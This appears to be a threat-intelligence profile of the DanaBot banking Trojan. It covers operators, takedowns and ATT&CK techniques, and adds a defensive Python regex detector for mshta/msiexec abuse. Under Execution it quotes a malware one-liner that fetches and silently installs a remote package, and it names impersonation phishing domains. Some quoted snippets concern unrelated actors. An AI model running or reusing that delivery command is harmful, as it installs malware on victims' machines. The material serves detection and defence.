DanaBot
DanaBot is a modular malware family first observed in 2018 and widely described as a banking Trojan that also operates as a broader information-stealing and malware-delivery platform. It is commercialized in cybercriminal ecosystems and has been operated under a malware-as-a-service model with multiple affiliates. Reporting links its development and operation to SCULLY SPIDER, and Microsoft maps related financially motivated activity to Storm-1044. One report also notes that U.S. authorities described two DanaBot variants, including one used for cybercrime and one for espionage.
High-confidence reporting states that DanaBot spreads through phishing emails and has been used in large-scale global cybercrime campaigns. Its primary theft objectives include banking credentials, browser data, personal information, and other valuable data. Additional reporting says newer activity targeted financial institutions, cryptocurrency wallets, and individual victims. DanaBot has also been used to facilitate access for other malware families: reporting explicitly states it has facilitated or delivered TrickBot, DoppelDridex, Zloader, and Latrodectus, and other reporting notes that loaders such as HijackLoader/IDAT Loader and Matanbuchus have distributed DanaBot.
The malware remained highly active until May 2025, when it was targeted in Operation Endgame actions and related law-enforcement disruptions. Multiple sources state that DanaBot infrastructure and operators were disrupted or targeted by international law enforcement, including Operation Endgame actions in 2025, and that researchers leveraged a Heartbleed-like C2 memory-leak vulnerability dubbed DanaBleed to gain visibility into operator data and support the takedown. Despite the disruption, DanaBot resurfaced in November 2025 with "Version 669," and its developers later announced a complete code revision claiming improved speed and stability.
Operationally, DanaBot is associated with command-and-control infrastructure that was difficult to detect at scale. One report states that during 2025 activity DanaBot maintained nearly 150 active C2 servers per day and about 1,000 daily victims across more than 40 countries, with only a minority of C2 infrastructure showing positive VirusTotal detections. Reporting also places DanaBot among botnets and malware families subjected to repeated law-enforcement scrutiny and disruption since 2021.
Observed delivery and ecosystem relationships include phishing-based infection, use by TA578 in at least one chain to deliver Latrodectus via an existing DanaBot infection, and distribution by third-party loaders including HijackLoader/IDAT Loader and Matanbuchus. DanaBot is also mentioned in connection with ClickFix-style campaigns and XWorm/DanaBot-associated PowerShell delivery infrastructure. Overall, reporting consistently characterizes DanaBot as a modular, persistently updated banking Trojan and infostealer that evolved into a broader access-and-delivery platform used in financially motivated cybercrime operations worldwide.
Groups observed using it
4 distinct threat actors attributed by public researchers.
SCULLY SPIDER develops and operates the DanaBot botnet, which originated primarily as a banking Trojan but expanded beyond banking in 2021 and has since been used to facilitate access for other types of malware, including TrickBot, DoppelDridex, and Zloader.
In one campaign observed on 15 December 2023, Proofpoint observed TA578 deliver the Latrodectus downloader via a DanaBot infection.
"US Takes Down DanaBot Malware, Indicts Developers" ... "Unusually, there are two DanaBot variants: One for cybercrime and one for espionage."
Techniques & procedures
18 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development
1 technique
"Most recently, the malvertising-based Fallout exploit kit chain has been used to deliver instances of Maze ransomware"
Initial Access
2 techniques
Latrodectus - a sophisticated malware loader first spotted in 2023 used by threat actors like TA578 in phishing campaigns... it is delivered via malicious email attachments.
The actor did not use thread hijacking, but instead used a variety of different subjects with URLs in the email body. The URLs led to the download of a JavaScript file.
Execution
3 techniques
Campaigns frequently rely on multi-stage, fileless execution chains involving PowerShell and HTA scripts.
mshta.exe vbscript:createobject("wscript.shell").run("Cmd /c for /d %i in (...) do Msiexec /i http://%i/3EBCE3A4.Png /Q",0)(window.close)
"...a command to be copied to the users' clipboard... guided to run a PowerShell command on Windows... substituted by a shell script... on macOS."
Stealth
4 techniques
The HTA decodes the next payload from an array of character codes and launches it... The downloaded PowerShell script is heavily obfuscated... We observed obfuscation techniques unique to each campaign, aiming to mask keywords that trigger alerts in EDRs and SIEMs.
"The starting point of the attack is a web page that impersonates Spectrum ("panel-spectrum[.]net" or "spectrum-ticket[.]net")."; "...email phishing campaign that spoofs Booking.com..."
The script block contains a minimal JavaScript loader that implements a Base64 decoding function... The main function decodes and executes the embedded script.
Attackers continue to exploit Microsoft HTML Application Host (MSHTA)... a legacy utility available by default on Windows systems that can execute VBScript and JavaScript from local or remote files.
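As an added defender-side example (not code from the page's sources or from Mallory), the following Python flags the mshta/msiexec execution chain quoted under Execution and the MSHTA abuse noted under Stealth, run over constructed process-creation command lines; the rule names, sample lines and severity thresholds are my own assumptions.

```python
import re

# Constructed sample command lines (not real telemetry). The first mirrors the
# mshta -> cmd for-loop -> msiexec chain quoted above, domain list elided as "(...)".
SAMPLE_COMMAND_LINES = [
    'mshta.exe vbscript:createobject("wscript.shell").run("Cmd /c for /d %i in (...) '
    'do Msiexec /i http://%i/3EBCE3A4.Png /Q",0)(window.close)',
    'mshta.exe C:\\Users\\user\\Downloads\\invoice.hta',
    'powershell.exe -NoProfile -Command "Get-Process"',
    'msiexec.exe /i C:\\installers\\app.msi /qn',
]

# Rule name -> case-insensitive regex over the full command line.
RULES = {
    # Inline script handed to mshta via a protocol handler instead of an .hta file.
    "mshta_inline_script": re.compile(r"\bmshta(?:\.exe)?\s+(?:vbscript|javascript):", re.I),
    # mshta spawning a shell through the WScript.Shell COM object.
    "mshta_wscript_shell": re.compile(r"\bmshta\b.*wscript\.shell", re.I),
    # msiexec installing a package fetched over HTTP(S); the file extension is irrelevant.
    "msiexec_remote_package": re.compile(r"\bmsiexec(?:\.exe)?\b.*\s/i\s+https?://", re.I),
    # cmd for-loop rotating through candidate hosts, the redundancy trick in the chain.
    "cmd_for_loop_host_rotation": re.compile(
        r"\bfor\s+/d\s+%\w\s+in\s*\(.*\)\s*do\b.*https?://%\w", re.I),
}


def match_rules(command_line: str) -> list:
    """Return the names of every rule that fires on one command line."""
    return [name for name, rx in RULES.items() if rx.search(command_line)]


def severity(matches: list) -> str:
    """Assumed scoring: two or more chained indicators is high, one is medium."""
    if len(matches) >= 2:
        return "high"
    return "medium" if matches else "none"


def triage(command_lines) -> dict:
    """Map each suspicious command line to (severity, matched rule names)."""
    findings = {}
    for cmd in command_lines:
        hits = match_rules(cmd)
        if hits:
            findings[cmd] = (severity(hits), hits)
    return findings


if __name__ == "__main__":
    for cmd, (sev, hits) in triage(SAMPLE_COMMAND_LINES).items():
        print(f"[{sev}] {hits}\n    {cmd[:80]}")
```

Only the chained sample scores high; a local .hta launch or a local MSI install fires no rule, which is the point of keying on the inline script handler and the remote package URL rather than on mshta or msiexec alone.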
Credential Access
1 technique
Collection
2 techniques
DanaBot – initially discovered as a modular banking Trojan in 2018... It primarily aims to steal banking credentials, browser data, and personal information.
Command and Control
4 techniques
Beginning in December 2022 and running into November 2024, that campaign infiltrated 33 separate Storm-0156 C2 nodes. Investigators later documented 37 Secret Blizzard and Storm-0156 C2 nodes tied to the operation.
"The new malware utilizes SOCKS5 proxies to mask network traffic to and from Command and Control (C&C) infrastructure..." / "...sets up SOCKS5 proxies on victim computers that can then be used by threat actors to tunnel/hide the malicious traffic associated with other malware."
Following Operation Endgame II, DanaBot resurfaced in November 2025 with “Version 669”—leveraging complex multi-stage attacks to target financial institutions, cryptocurrency wallets, and individual victims.
On 15 December 2023, Proofpoint observed TA578 deliver the Latrodectus downloader via a DanaBot infection.
Impact
2 techniques
Deploying ransomware through which cyber actors remove victim access to data (usually via encryption), potentially causing significant disruption to operations.
Recent Russian state-sponsored cyber operations have included distributed denial-of-service (DDoS) attacks... The primary distinguishing characteristic of the group is its operations use techniques aimed at causing disruptive or destructive effects at targeted organizations using DDoS attacks or wiper malware.
IOCs tracked for this family
4 indicators attributed across vendor reports, sandbox runs, and researcher write-ups.
Recent activity
46 sources tracked across advisories, community write-ups, and news.
Banking trojan/botnet conducting complex multi-stage attacks against financial institutions, cryptocurrency wallets, and individuals across 40+ countries.
Named as one of the malicious networks or malware operations disrupted during the broader crackdown on cybercrime infrastructure.
Named as a botnet that has faced law enforcement scrutiny since 2021.
A named malware family mentioned as one of the payloads distributed by HijackLoader.